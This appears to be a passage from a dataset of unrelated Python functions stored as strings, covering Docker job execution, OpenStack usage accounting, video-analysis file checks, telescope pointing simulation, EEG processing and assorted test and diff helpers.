FS, we know where the dependency is stored and can get the contents directly\n dependency_path = os.path.realpath(os.path.join(dep.location, dep.parent_path))\n else:\n dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)\n dependency_path = dependency_keys_to_paths[dep_key]\n\n if dep.child_path == RunStateMachine._CURRENT_DIRECTORY:\n # Mount all the content of the dependency_path to the top-level of the bundle\n for child in os.listdir(dependency_path):\n child_path = os.path.normpath(os.path.join(run_state.bundle_path, child))\n to_mount.append(\n DependencyToMount(\n docker_path=os.path.join(docker_dependencies_path, child),\n child_path=child_path,\n parent_path=os.path.join(dependency_path, child),\n )\n )\n run_state = run_state._replace(\n paths_to_remove=(run_state.paths_to_remove or []) + [child_path]\n )\n else:\n to_mount.append(\n DependencyToMount(\n docker_path=os.path.join(docker_dependencies_path, dep.child_path),\n child_path=full_child_path,\n parent_path=dependency_path,\n )\n )\n\n first_element_of_path = 
Path(dep.child_path).parts[0]\n if first_element_of_path == RunStateMachine._ROOT:\n run_state = run_state._replace(\n paths_to_remove=(run_state.paths_to_remove or []) + [full_child_path]\n )\n else:\n # child_path can be a nested path, so later remove everything from the first element of the path\n path_to_remove = os.path.join(run_state.bundle_path, first_element_of_path)\n run_state = run_state._replace(\n paths_to_remove=(run_state.paths_to_remove or []) + [path_to_remove]\n )\n for dependency in to_mount:\n try:\n mount_dependency(dependency, self.shared_file_system)\n except OSError as e:\n log_bundle_transition(\n bundle_uuid=run_state.bundle.uuid,\n previous_stage=run_state.stage,\n next_stage=RunStage.CLEANING_UP,\n reason=str(e.__class__),\n level=logging.ERROR,\n )\n return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=str(e))\n\n if run_state.resources.network:\n docker_network = self.docker_network_external.name\n else:\n docker_network = self.docker_network_internal.name\n\n # 3) Start container\n try:\n container_id = self.bundle_runtime.start_bundle_container(\n run_state.bundle_path,\n run_state.bundle.uuid,\n docker_dependencies,\n run_state.bundle.command,\n run_state.resources.docker_image,\n network=docker_network,\n cpuset=cpuset,\n gpuset=gpuset,\n request_cpus=run_state.resources.cpus,\n request_gpus=run_state.resources.gpus,\n memory_bytes=run_state.resources.memory,\n runtime=self.docker_runtime,\n shared_memory_size_gb=self.shared_memory_size_gb,\n )\n self.worker_docker_network.connect(container_id)\n except DockerUserErrorException as e:\n message = 'Cannot start Docker container: {}'.format(e)\n log_bundle_transition(\n bundle_uuid=run_state.bundle.uuid,\n previous_stage=run_state.stage,\n next_stage=RunStage.CLEANING_UP,\n reason='Cannot start Docker container.',\n level=logging.ERROR,\n )\n return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)\n except Exception as e:\n message = 'Cannot start container: {}'.format(e)\n logger.error(message)\n logger.error(traceback.format_exc())\n raise\n\n return run_state._replace(\n stage=RunStage.RUNNING,\n run_status='Running job in container.',\n container_id=container_id,\n container=None,\n docker_image=image_state.digest,\n has_contents=True,\n cpuset=cpuset,\n gpuset=gpuset,\n )", "def extract(self, extract_from, extract_to):\n # Some API calls do not expect a TZ, so we have to remove the timezone\n # from the dates. We assume that all dates coming from upstream are\n # in UTC TZ.\n extract_from = extract_from.replace(tzinfo=None)\n extract_to = extract_to.replace(tzinfo=None)\n\n # Our records\n self.records = {}\n self.acc_records = {}\n\n # We cannot use just 'changes-since' in the servers.list() API query,\n # as it will only include servers that have changed its status after\n # that date. However we cannot just get all the usages and then query\n # server by server, as deleted servers are not returned by the usages\n # call. Moreover, Nova resets the start_time after performing some\n # actions on the server (rebuild, resize, rescue). 
If we use that time,\n # we may get a drop in the wall time, as a server that has been resized\n # in the middle of its lifetime will suddenly change its start_time\n #\n # Therefore, what we do is the following (hackish approach)\n #\n # 1.- List all the servers that changed its status after the start time\n # for the reporting period\n # 2.- Build the records for the period [start, end] using those servers\n # 3.- Get all the usages, being aware that the start time may be wrong\n # 4.- Iter over the usages and:\n # 4.1.- get information for servers that are not returned by the query\n # in (1), for instance servers that have not changed it status.\n # We build then the records for those severs\n # 4.2.- For all the servers, adjust the CPU, memory and disk resources\n # as the flavor may not exist, but we can get those resources\n # from the usages API.\n\n # Lets start\n\n # 1.- List all the deleted servers from that period.\n servers = self._get_servers(extract_from)\n # 2.- Build the records for the period. Drop servers outside the period\n # (we do this manually as we cannot limit the query to a period, only\n # changes after start date).\n self._process_servers_for_period(servers, extract_from, extract_to)\n\n # 3.- Get all the usages for the period\n usages = self._get_usages(extract_from, extract_to)\n # 4.- Iter over the results and\n # This one will also generate accelerator records if GPU flavors\n # are found.\n self._process_usages_for_period(usages, extract_from, extract_to)\n\n return list(self.records.values()) + list(self.acc_records.values())", "def errorChecks(self):\n stop_calculation = False\n found_error = False\n errors = {\"Info\": [], \"Critical\": []}\n error_types = []\n ori_images = 0\n of_images = 0\n depth_images = 0\n back_of_images = 0\n\n if os.path.exists(self.savePathJoin(\"Images\")):\n ori_images = len(\n listDirectory(self.savePathJoin(\"Images\"), extension=\"png\")\n )\n # Check image folder\n if self.img_exist and not os.path.exists(self.savePathJoin(\"Images\")):\n if os.path.exists(self.user[\"Video\"]):\n errors[\"Info\"].append(\n \"Images folder {0} doesn't exist -> Recreate it and recalculate optical flow and depth estimations\".format(\n self.savePathJoin(\"Images\")\n )\n )\n error_types.append(\"NoImages\")\n else:\n stop_calculation = True\n errors[\"Critical\"].append(\n (\n \"Images folder {0} and video file {1} don't exist -> Stopping run\".format(\n self.savePathJoin(\"Images\"), self.user[\"Video\"]\n )\n )\n )\n elif self.img_exist and os.path.exists(self.user[\"Video\"]):\n errors[\"Info\"].append(\n \"Both the video {0} and Images folder {1} exist -> using Images folder by default\".format(\n self.user[\"Video\"], self.savePathJoin(\"Images\")\n )\n )\n elif not self.img_exist and not os.path.isfile(self.user[\"Video\"]):\n stop_calculation = True\n errors[\"Critical\"].append(\n (\n \"Images folder {0} and video file {1} don't exist -> Stopping run\".format(\n self.savePathJoin(\"Images\"), self.user[\"Video\"]\n )\n )\n )\n\n # Check video file\n if self.user[\"Video\"] != \"\" and not os.path.isfile(self.user[\"Video\"]):\n if os.path.exists(self.savePathJoin(\"Images\")):\n errors[\"Info\"].append(\n (\n \"Video file {0} doesn't exist -> Using images in the Images folder instead\".format(\n self.user[\"Video\"]\n )\n )\n )\n else:\n stop_calculation = True\n errors[\"Critical\"].append(\n (\n \"Images folder {0} and video file {1} don't exist -> Stopping run\".format(\n self.savePathJoin(\"Images\"), self.user[\"Video\"]\n )\n 
)\n )\n elif os.path.isfile(self.user[\"Video\"]) and os.path.exists(\n self.savePathJoin(\"Images\")\n ):\n pass\n\n # Check optical flow\n if self.of_exist and not os.path.exists(self.savePathJoin(\"Of\")):\n errors[\"Info\"].append(\n (\n \"Optical flow folder {0} doesn't exist -> Recalculating optical flow\".format(\n self.savePathJoin(\"Of\")\n )\n )\n )\n error_types.append(\"NoOf\")\n elif self.of_exist:\n of_images = len(listDirectory(self.savePathJoin(\"Of\"), extension=\"png\"))\n if of_images != ori_images - 1 and ori_images != 0:\n errors[\"Info\"].append(\n (\n \"Optical flow image number {0} doesn't match video image number {1} - 1 -> Recalculating optical flow\".format(\n of_images, ori_images\n )\n )\n )\n error_types.append(\"NoOf\")\n\n # Check backward optical flow\n if self.back_of_exist and not os.path.exists(self.savePathJoin(\"Back_Of\")):\n errors[\"Info\"].append(\n (\n \"Backward optical flow folder {0} doesn't exist -> Recalculating backward optical flow\".format(\n self.savePathJoin(\"Back_Of\")\n )\n )\n )\n error_types.append(\"NoOf\")\n elif self.back_of_exist:\n back_of_images = len(\n listDirectory(self.savePathJoin(\"Back_Of\"), extension=\"png\")\n )\n if back_of_images != of_images:\n errors[\"Info\"].append(\n (\n \"Backward optical flow image number {0} doesn't match optical flow image number {1} -> Recalculating backward optical flow\".format(\n back_of_images, of_images\n )\n )\n )\n error_types.append(\"NoOf\")\n\n # Check depth estimation\n if self.depth_exist and not os.path.exists(self.savePathJoin(\"Depth\")):\n errors[\"Info\"].append(\n (\n \"Depth folder {0} doesn't exist -> Recalculating depth\".format(\n self.savePathJoin(\"Depth\")\n )\n )\n )\n error_types.append(\"NoDepth\")\n elif self.depth_exist:\n depth_images = len(\n listDirectory(self.savePathJoin(\"Depth\"), extension=\"png\")\n )\n if depth_images != ori_images and ori_images != 0:\n errors[\"Info\"].append(\n (\n \"Depth image number {0} doesn't match video image number {1} -> Recalculating depth\".format(\n depth_images, ori_images\n )\n )\n )\n error_types.append(\"NoDepth\")\n\n # Check ground truth\n if self.gt_exist and not os.path.isfile(self.user[\"GT\"]):\n errors[\"Info\"].append(\n (\n \"Ground Truth file {0} doesn't exist -> File won't be used\".format(\n self.user[\"GT\"]\n )\n )\n )\n error_types.append(\"NoGT\")\n\n # Check super pixel labels\n if (\n self.super_pixel_method != \"\"\n and os.path.exists(\n os.path.join(self.savePathJoin(\"Super_Pixel\"), self.super_pixel_method)\n )\n and ori_images != 0\n and len(\n listDirectory(\n os.path.join(\n self.savePathJoin(\"Super_Pixel\"), self.super_pixel_method\n ),\n extension=\".npy\",\n )\n )\n != ori_images\n ):\n errors[\"Info\"].append(\n (\n \"Super pixel label number {0} doesn't match image number {1} -> Recalculating super pixel labels\".format(\n len(\n listDirectory(\n os.path.join(\n self.savePathJoin(\"Super_Pixel\"),\n self.super_pixel_method,\n ),\n extension=\".npy\",\n )\n ),\n ori_images,\n )\n )\n )\n error_types.append(\"LabelError\")\n\n # Check object detection\n if self.ui.c_object_detection.isChecked() and os.path.exists(\n self.savePathJoin(\"ObjectDetection\")\n ):\n if (\n len(\n listDirectory(\n self.savePathJoin(\"ObjectDetection\"), extension=\".png\"\n )\n )\n != ori_images\n ):\n errors[\"Info\"].append(\n \"Object Detection image number {0} doesn't match image number of video {1} -> Recalculating object detection\".format(\n len(\n listDirectory(\n 
self.savePathJoin(\"ObjectDetection\"), extension=\".png\"\n )\n ),\n ori_images,\n )\n )\n error_types.append(\"ObDetError\")\n elif (\n len(\n listDirectory(\n self.savePathJoin(\"ObjectDetection\"), extension=\".npy\"\n )\n )\n != ori_images\n ):\n errors[\"Info\"].append(\n \"Object Detection numpy array number {0} doesn't match image number of video {1} -> Recalculating object detection\".format(\n len(\n listDirectory(\n self.savePathJoin(\"ObjectDetection\"), extension=\".npy\"\n )\n ),\n ori_images,\n )\n )\n error_types.append(\"ObDetError\")\n\n answer = \"\"\n if len(errors[\"Info\"]) > 0 and len(errors[\"Critical\"]) == 0:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n msg.setText(\n \"Some calculations might not run the way you expect them.\\nIn show details check the right side of the arrows to see what will happen.\"\n )\n msg.setWindowTitle(\"Information\")\n all_info = \"\"\n for info in errors[\"Info\"]:\n all_info += info + \"\\n\\n\"\n msg.setDetailedText(all_info)\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Abort)\n answer = msg.exec_()\n elif len(errors[\"Critical\"]) > 0:\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Critical)\n msg.setText(\n \"Found critical error\\nCouldn't start run, see show details for more information\"\n )\n msg.setWindowTitle(\"Critical Error\")\n all_info = \"\"\n for info in errors[\"Critical\"]:\n all_info += info + \"\\n\"\n msg.setDetailedText(all_info)\n msg.setStandardButtons(QMessageBox.Abort)\n answer = msg.exec_()\n\n if answer != int(\"0x00040000\", 16):\n for ty in error_types:\n logging.info(\"Solve error: {0}\".format(ty))\n if ty == \"NoImage\":\n self.img_exist = False\n self.of_exist = False\n self.back_of_exist = False\n self.depth_exist = False\n elif ty == \"NoOf\":\n self.of_exist = False\n self.back_of_exist = False\n elif ty == \"NoDepth\":\n self.depth_exist = False\n elif ty == \"NoGT\":\n self.gt_exist = False\n self.user[\"GT\"] = \"\"\n elif ty == \"LabelError\":\n self.create_super_pixel_label = True\n shutil.rmtree(\n os.path.join(\n self.savePathJoin(\"Super_Pixel\"), self.super_pixel_method\n )\n )\n elif ty == \"ObDetError\":\n self.object_detection_dir_exist = False\n shutil.rmtree(self.savePathJoin(\"ObjectDetection\"))\n\n return answer == int(\"0x00040000\", 16) or stop_calculation", "def HandleFiles(variables):\n\n # The template file is the html file into which we will write the\n # data from the stats file, formatted correctly for the gviz_api.\n template_file = open(variables[1], \"r\")\n page_template = template_file.read()\n template_file.close()\n\n # This is the path match pattern for finding stats files amongst\n # all the other files it could be. 
eg: *.stt\n file_pattern = variables[2]\n\n # This is the directory with files that we will use to do the comparison\n # against.\n baseline_dir = variables[3]\n snrs = ''\n filestable = {}\n filestable['dsnr'] = ''\n filestable['drate'] = ''\n filestable['avg'] = ''\n\n # Go through each metric in the list.\n for column in range(1,2):\n\n # Dirs is directories after the baseline to compare to the base.\n dirs = variables[4:len(variables)]\n\n # Find the metric files in the baseline directory.\n dir_list = sorted(fnmatch.filter(os.listdir(baseline_dir), file_pattern))\n\n for metric in ['avg','dsnr','drate']:\n description = {\"file\": (\"string\", \"File\")}\n\n # Go through each directory and add a column header to our description.\n countoverall = {}\n sumoverall = {}\n\n for directory in dirs:\n description[directory] = (\"number\", directory)\n countoverall[directory] = 0\n sumoverall[directory] = 0\n\n # Data holds the data for the visualization, name given comes from\n # gviz_api sample code.\n data = []\n for filename in dir_list:\n row = {'file': splitext(basename(filename))[0] }\n baseline_file_name = baseline_dir + \"/\" + filename\n\n # Read the metric file from each of the directories in our list.\n for directory in dirs:\n metric_file_name = directory + \"/\" + filename\n\n # If there is a metric file in the current directory, open it\n # and calculate its overall difference between it and the baseline\n # directory's metric file.\n if os.path.isfile(metric_file_name):\n overall = FileBetter(baseline_file_name, metric_file_name,\n column, metric)\n row[directory] = overall\n\n sumoverall[directory] += overall\n countoverall[directory] += 1\n\n data.append(row)\n\n # Add the overall numbers.\n row = {\"file\": \"OVERALL\" }\n if countoverall[directory]:\n for directory in dirs:\n row[directory] = sumoverall[directory] / countoverall[directory]\n data.append(row)\n\n # write the tables out\n data_table = gviz_api.DataTable(description)\n data_table.LoadData(data)\n\n filestable[metric] = ( filestable[metric] + \"filestable_\" + metric +\n \"[\" + str(column) + \"]=\" + data_table.ToJSon()\n + \"\\n\" )\n\n filestable_avg = filestable['avg']\n filestable_dpsnr = filestable['dsnr']\n filestable_drate = filestable['drate']\n\n # Now we collect all the data for all the graphs. 
First the column\n # headers which will be Datarate and then each directory.\n columns = (\"datarate\",baseline_dir)\n description = {\"datarate\":(\"number\", \"Datarate\")}\n for directory in dirs:\n description[directory] = (\"number\", directory)\n\n description[baseline_dir] = (\"number\", baseline_dir)\n\n snrs = snrs + \"snrs[\" + str(column) + \"] = [\"\n\n # Now collect the data for the graphs, file by file.\n for filename in dir_list:\n\n data = []\n\n # Collect the file in each directory and store all of its metrics\n # in the associated gviz metrics table.\n all_dirs = dirs + [baseline_dir]\n for directory in all_dirs:\n\n metric_file_name = directory + \"/\" + filename\n if not os.path.isfile(metric_file_name):\n continue\n\n # Read and parse the metrics file storing it to the data we'll\n # use for the gviz_api.Datatable.\n metrics = ParseMetricFile(metric_file_name, column)\n for bitrate, metric in metrics:\n data.append({\"datarate\": bitrate, directory: metric})\n\n data_table = gviz_api.DataTable(description)\n data_table.LoadData(data)\n snrs = snrs + \"'\" + data_table.ToJSon(\n columns_order=tuple([\"datarate\",baseline_dir]+dirs)) + \"',\"\n\n snrs = snrs + \"]\\n\"\n\n formatters = \"\"\n for i in range(len(dirs)):\n formatters = \"%s formatter.format(better, %d);\" % (formatters, i+1)\n\n print FillForm(page_template, vars())\n return", "def nonsidereal_pointing_updates(self):\n obs = np.array(self.info['ObservationID'])\n all_date_obs = np.array(self.info['date_obs'])\n all_time_obs = np.array(self.info['time_obs'])\n all_exposure = np.array(self.info['exposure'])\n all_apertures = np.array(self.info['aperture'])\n tracking = np.array(self.info['Tracking'])\n targs = np.array(self.info['TargetID'])\n inst = np.array(self.info['Instrument'])\n ra_from_pointing_file = np.array(self.info['ra'])\n dec_from_pointing_file = np.array(self.info['dec'])\n nonsidereal_index = np.where(np.array(tracking) == 'non-sidereal')\n all_nonsidereal_targs = targs[nonsidereal_index]\n all_nonsidereal_instruments = inst[nonsidereal_index]\n\n # Get a list of the unique (target, instrument) combinations for\n # non-sidereal observations\n inst_targs = [[t, i] for t, i in zip(all_nonsidereal_targs, all_nonsidereal_instruments)]\n ctr = Counter(tuple(x) for x in inst_targs)\n unique = [list(key) for key in ctr.keys()]\n\n # Check that all non-sidereal targets have catalogs associated with them\n #for targ, inst in zip(nonsidereal_targs, nonsidereal_instruments):\n for element in unique:\n targ, inst = element\n\n # Skip unsupported instruments\n if inst in ['NIRSpec', 'MIRI']:\n continue\n\n ns_catalog = get_nonsidereal_catalog_name(self.catalogs, targ, inst)\n catalog_table, pos_in_xy, vel_in_xy = read_nonsidereal_catalog(ns_catalog)\n\n # If the ephemeris_file column is present but equal to 'none', then\n # remove the column\n if 'ephemeris_file' in catalog_table.colnames:\n if catalog_table['ephemeris_file'][0].lower() == 'none':\n catalog_table.remove_column('ephemeris_file')\n\n if 'ephemeris_file' in catalog_table.colnames:\n ephemeris_file = catalog_table['ephemeris_file'][0]\n ra_ephem, dec_ephem = ephemeris_tools.get_ephemeris(ephemeris_file)\n\n # Find the observations that use this target\n exp_index_this_target = targs == targ\n obs_this_target = np.unique(obs[exp_index_this_target])\n\n # Loop over observations\n for obs_name in obs_this_target:\n\n # Get date/time for every exposure\n obs_exp_indexes = np.where(obs == obs_name)\n obs_dates = all_date_obs[obs_exp_indexes]\n 
obs_times = all_time_obs[obs_exp_indexes]\n exposures = all_exposure[obs_exp_indexes]\n apertures = all_apertures[obs_exp_indexes]\n unique_apertures = np.unique(apertures)\n\n start_dates = []\n for date_obs, time_obs in zip(obs_dates, obs_times):\n ob_time = '{}T{}'.format(date_obs, time_obs)\n try:\n start_dates.append(datetime.datetime.strptime(ob_time, '%Y-%m-%dT%H:%M:%S'))\n except ValueError:\n start_dates.append(datetime.datetime.strptime(ob_time, '%Y-%m-%dT%H:%M:%S.%f'))\n\n if 'ephemeris_file' in catalog_table.colnames:\n all_times = [ephemeris_tools.to_timestamp(elem) for elem in start_dates]\n\n # Create list of positions for all frames\n try:\n ra_target = ra_ephem(all_times)\n dec_target = dec_ephem(all_times)\n\n except ValueError:\n raise ValueError((\"Observation dates ({} - {}) are not present within the ephemeris file {}\"\n .format(start_dates[0], start_dates[-1], ephemeris_file)))\n else:\n if not pos_in_xy:\n # Here we assume that the source (and aperture reference location)\n # is located at the given RA, Dec at the start of the first exposure\n base_ra, base_dec = parse_RA_Dec(catalog_table['x_or_RA'].data[0], catalog_table['y_or_Dec'].data[0])\n ra_target = [base_ra]\n dec_target = [base_dec]\n\n ra_vel = catalog_table['x_or_RA_velocity'].data[0]\n dec_vel = catalog_table['y_or_Dec_velocity'].data[0]\n\n # If the source velocity is given in units of pixels/hour, then we need\n # to multiply this by the appropriate pixel scale.\n if vel_in_xy:\n if len(unique_apertures) > 1:\n if inst.lower() == 'nircam':\n det_ints = [int(ele.split('_')[0][-1]) for ele in unique_apertures]\n # If the observation contains NIRCam exposures in both the LW and\n # SW channels, then the source velocity is ambiguous due to the\n # different pixel scales. In that case, raise an exception.\n if np.min(det_ints) < 5 and np.max(det_ints) == 5:\n raise ValueError(('Non-sidereal source {} has no ephemeris file, and a velocity that '\n 'is specified in units of pixels/hour in the source catalog. '\n 'Since observation {} contains NIRCam apertures within both the '\n 'SW and LW channels (which have different pixel scales), '\n 'Mirage does not know which pixel scale to use '\n 'when placing the source.'.format(targ, obs_name)))\n\n # In this case, there is a well-defined pixel scale, so we can translate\n # velocities to units of arcsec/hour\n siaf = pysiaf.Siaf(inst)[unique_apertures[0]]\n ra_vel *= siaf.XSciScale\n dec_vel *= siaf.XSciScale\n\n # Calculate RA, Dec for each exposure given the velocities\n for ob_date in start_dates[1:]:\n delta_time = ob_date - start_dates[0]\n delta_ra = ra_vel * delta_time.total_seconds() / 3600.\n delta_dec = dec_vel * delta_time.total_seconds() / 3600.\n ra_target.append(base_ra + delta_ra)\n dec_target.append(base_dec + delta_dec)\n\n else:\n # Source location comes from the source catalog and is in units of pixels.\n # This can't really be supported, since we don't know which detector the\n # location is for. We could proceed, but Mirage would then put the source\n # pixel (x, y) in every aperture/detector.\n if len(unique_apertures) > 1:\n raise ValueError(('Non-sidereal source {} has no ephemeris file, and a location that '\n 'is specified in units of detector pixels in the source catalog. 
'\n 'Since observation {} contains multiple apertures (implying different '\n 'coordinate systems), Mirage does not know which coordinate system '\n 'to use when placing the source.'.format(targ, obs_name)))\n\n # If there is only a single aperture associated with the observation,\n # then we can proceed. We first need to translate the given x, y position\n # to RA, Dec\n base_ra, base_dec = aperture_xy_to_radec(catalog_table['x_or_RA'].data[0],\n catalog_table['y_or_Dec'].data[0],\n inst, aperture, fiducial_ra, fiducial_dec, pav3)\n\n\n ra_from_pointing_file[obs_exp_indexes] = ra_target\n dec_from_pointing_file[obs_exp_indexes] = dec_target\n\n self.info['TargetRA'] = ra_from_pointing_file\n self.info['TargetDec'] = dec_from_pointing_file\n\n # Need to update these values (which come from the pointing file)\n # so that below we can adjust them for the different detectors/apertures\n self.info['ra'] = [np.float64(ele) for ele in ra_from_pointing_file]\n self.info['dec'] = [np.float64(ele) for ele in dec_from_pointing_file]\n\n # These go into the pointing in the yaml file\n self.info['ra_ref'] = ra_from_pointing_file\n self.info['dec_ref'] = dec_from_pointing_file", "def compare_analysis_to_golden(log_filename: str, log_file_path: str) -> None:\n\n golden_result_filename = os.path.join(\n log_file_path, '{:s}_golden.json'.format(os.path.splitext(log_filename)[0]))\n\n with TemporaryDirectory() as tmp_dir:\n\n tmp_log_filename = os.path.join(tmp_dir, os.path.basename(log_filename))\n\n os.system('cp {:s} {:s}'.format(log_filename, tmp_log_filename))\n\n assert os.path.exists(tmp_log_filename), '{:s} does not exist.'.format(tmp_log_filename)\n\n process_logdata_ekf(tmp_log_filename, plot=False)\n\n analysis_result_filename = os.path.join(\n tmp_dir, '{:s}.json'.format(os.path.splitext(tmp_log_filename)[0]))\n\n assert os.path.exists(analysis_result_filename), '{:s} does not exist.'.format(\n analysis_result_filename)\n\n with open(analysis_result_filename, 'r') as file:\n analysis_results = json.load(file)\n\n with open(golden_result_filename, 'r') as file:\n golden_results = json.load(file)\n\n print('comparing analysis to golden results')\n\n for local_analysis_check, golden_analysis_check in zip(analysis_results, golden_results):\n print('{:s}'.format(local_analysis_check['type']))\n compare_check_analysis_result_ground_truth(\n local_analysis_check, golden_analysis_check,\n os.path.splitext(os.path.basename(tmp_log_filename))[0])", "def diff(s0, s1):\n from difflib import ndiff\n lst0 = s0.split(\"\\n\")\n lst1 = s1.split(\"\\n\")\n report = '\\n'.join(ndiff(lst0, lst1))\n return report", "def diff(s0, s1):\n from difflib import ndiff\n lst0 = s0.split(\"\\n\")\n lst1 = s1.split(\"\\n\")\n report = '\\n'.join(ndiff(lst0, lst1))\n return report", "def upscaled_rdirs_with_and_without_tarasov_upscaled_north_america_only_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):\n\n data_label=\"20170511_230901\"\n ref_label=\"20170507_135726\"\n ref_filename=os.path.join(self.plots_data_dir,\n 'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale'\n '_rdirs_{0}_updated.nc'.format(ref_label))\n data_filename=os.path.join(self.plots_data_dir,\n 'flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_data_ALG4_sinkless'\n '_downscaled_ls_mask_0k_upscale_rdirs_' + data_label + '_updated.nc')\n lsmask_filename=os.path.join(self.plots_data_dir,\n \"ls_mask_extract_ls_mask_from_corrected_\"\n \"HD_rdirs_20160504_142435.nc\")\n corrected_hd_rdirs_rmouthoutflow_file = 
os.path.join(self.plots_data_dir,\n \"rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs\"\n \"_{0}_updated.nc\".format(ref_label))\n upscaled_rdirs_rmouthoutflow_file = os.path.join(self.plots_data_dir,\n \"rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_north_america_only_\"\n \"data_ALG4_sinkless_\"\n \"downscaled_ls_mask_0k_upscale_rdirs_\" + data_label + \"_updated.nc\")\n self.FlowMapTwoColourComparisonWithCatchmentsHelper(ref_flowmap_filename=ref_filename,\n data_flowmap_filename=data_filename,\n ref_catchment_filename=\\\n \"catchmentmap_ICE5G_data_ALG4_\"\n \"sinkless_downscaled_ls_mask_0k_upscale_rdirs_{0}_updated.nc\"\\\n .format(ref_label),\n data_catchment_filename=\"catchmentmap_ICE5G_and_tarasov_upscaled_\"\n \"srtm30plus_north_america_only_data_ALG4_sinkless_downscaled_ls_\"\n \"mask_0k_upscale_rdirs_\" + data_label + \"_updated.nc\",\n ref_rdirs_filename=\"upscaled_rdirs_ICE5G_data\"\n \"_ALG4_sinkless_downscaled_\"\n \"ls_mask_0k_upscale_rdirs_{0}_updated.nc\".format(ref_label),\n data_rdirs_filename=None,\n reference_rmouth_outflows_filename=\\\n corrected_hd_rdirs_rmouthoutflow_file,\n data_rmouth_outflows_filename=\\\n upscaled_rdirs_rmouthoutflow_file,\n lsmask_filename=lsmask_filename,\n minflowcutoff=50,flip_data=False,\n rotate_data=True,flip_ref=False,rotate_ref=True,\n lsmask_has_same_orientation_as_ref=False,\n invert_ls_mask=False,\n first_datasource_name=\"Reference\",\n matching_parameter_set='magnitude_extensive',\n use_single_color_for_discrepancies=True,\n second_datasource_name=\"Data\",grid_type='HD')", "def calculate(self, data, *args, **kwargs):\n \n # Sets up priority queue, where data is prioritized by date\n queue = []\n \n # Sets up data dictionaries that will be used to contain calculated data\n severity_data = OrderedDict()\n status_data = OrderedDict()\n current_state = { }\n \n # List of fields used\n fields = [PROJECT, TRANS, STATUS, PRIORITY]\n \n # Populates priority queue with appropriate data\n for key, param_data in data.iteritems():\n # Grabs param_data fields\n priority = param_data.get(PRIORITY, None)\n hist = param_data.get(HIST, None)\n proj = param_data.get(PROJECT, self.project)\n \n # Adds the historical statuses of the current JIRA item to the queue\n if (hist):\n for i, date in enumerate(hist[TRANS]):\n heapq.heappush(queue, (date, proj, key, hist[NEW][i], priority))\n \n # Iterates through dates to populate status and severity data dictionaries\n if (queue):\n earliest = queue[0][0]\n for date in get_historical_dates(earliest, self.extraction_day, False):\n # Pops items off queue until queue is empty or date limit is reached\n while(queue and queue[0][0].date() <= date):\n curr, proj, key, status, priority = heapq.heappop(queue)\n \n # Maps the key's current parameters, overwriting previous mapping\n current_state[key] = { }\n for field, value in zip(fields, [proj, curr, status, priority]):\n current_state[key][field] = value\n \n # Sets severity and status metric data at the given date\n severity_data[date] = self._get_severity_data(current_state)\n status_data[date] = self._get_status_data(current_state)\n \n # Gets age data separately from status and severity\n age_map = self._get_average_age_data(data)\n \n return severity_data, status_data, age_map", "def calculate_diagnostic_vars(self):\n pass", "def perform_reference(self):\n # Phase 1: Estimate the true signal mean with robust referencing\n self.robust_reference()\n if self.noisy_channels[\"bad_all\"]:\n self.raw.info[\"bads\"] = 
self.noisy_channels[\"bad_all\"]\n self.raw.interpolate_bads()\n self.reference_signal = (\n np.nanmean(self.raw.get_data(picks=self.reference_channels), axis=0) * 1e6\n )\n rereferenced_index = [\n self.ch_names_eeg.index(ch) for ch in self.rereferenced_channels\n ]\n self.EEG = self.remove_reference(\n self.EEG, self.reference_signal, rereferenced_index\n )\n\n # Phase 2: Find the bad channels and interpolate\n self.raw._data = self.EEG * 1e-6\n noisy_detector = NoisyChannels(self.raw)\n noisy_detector.find_all_bads(ransac=self.ransac)\n\n # Record Noisy channels and EEG before interpolation\n self.bad_before_interpolation = noisy_detector.get_bads(verbose=True)\n self.EEG_before_interpolation = self.EEG.copy()\n\n bad_channels = _union(self.bad_before_interpolation, self.unusable_channels)\n self.raw.info[\"bads\"] = bad_channels\n self.raw.interpolate_bads()\n reference_correct = (\n np.nanmean(self.raw.get_data(picks=self.reference_channels), axis=0) * 1e6\n )\n self.EEG = self.raw.get_data() * 1e6\n self.EEG = self.remove_reference(\n self.EEG, reference_correct, rereferenced_index\n )\n # reference signal after interpolation\n self.reference_signal_new = self.reference_signal + reference_correct\n # MNE Raw object after interpolation\n self.raw._data = self.EEG * 1e-6\n\n # Still noisy channels after interpolation\n self.interpolated_channels = bad_channels\n noisy_detector = NoisyChannels(self.raw)\n noisy_detector.find_all_bads(ransac=self.ransac)\n self.still_noisy_channels = noisy_detector.get_bads()\n self.raw.info[\"bads\"] = self.still_noisy_channels\n return self", "def lf_abnormal_interp_with_slowing(report):\n if 'interpretation' in report.sections.keys():\n interpretation = report.sections['interpretation']\n interp_text = interpretation['text']\n return abnormal_interp_with_slowing(interp_text)\n elif 'summary' in report.sections:\n return abnormal_interp_with_slowing(report.sections['summary']['text'])\n elif 'findings' in report.sections: # fall back to look in the findings \n if 'summary' in report.sections['findings']: # fall back to look for a summary instead\n return abnormal_interp_with_slowing(report.sections['findings']['summary'])\n if 'impression' in report.sections['findings']:\n return abnormal_interp_with_slowing(report.sections['findings']['impression'])\n return ABSTAIN_VAL\n elif 'narrative' in report.sections: # fall back to look in the findings \n ky = 'narrative'\n if 'summary' in report.sections[ky]: # fall back to look for a summary instead\n return abnormal_interp_with_slowing(report.sections[ky]['summary'])\n if 'impression' in report.sections[ky]:\n return abnormal_interp_with_slowing(report.sections[ky]['impression'])\n # could try running on all of findings but would really need to check then\n \n return ABSTAIN_VAL \n else:\n return ABSTAIN_VAL", "def get_files_diff(self, current_files_data):\n if self.saved_files_data:\n saved_files_paths, saved_files_hashes = zip(*self.saved_files_data.items())\n else:\n saved_files_paths, saved_files_hashes = [], []\n if current_files_data:\n current_files_paths, current_files_hashes = zip(*current_files_data.items())\n else:\n current_files_paths, current_files_hashes = [], []\n\n missing_files_paths = list(set(saved_files_paths).difference(set(current_files_paths)))\n missing_files_hashes = 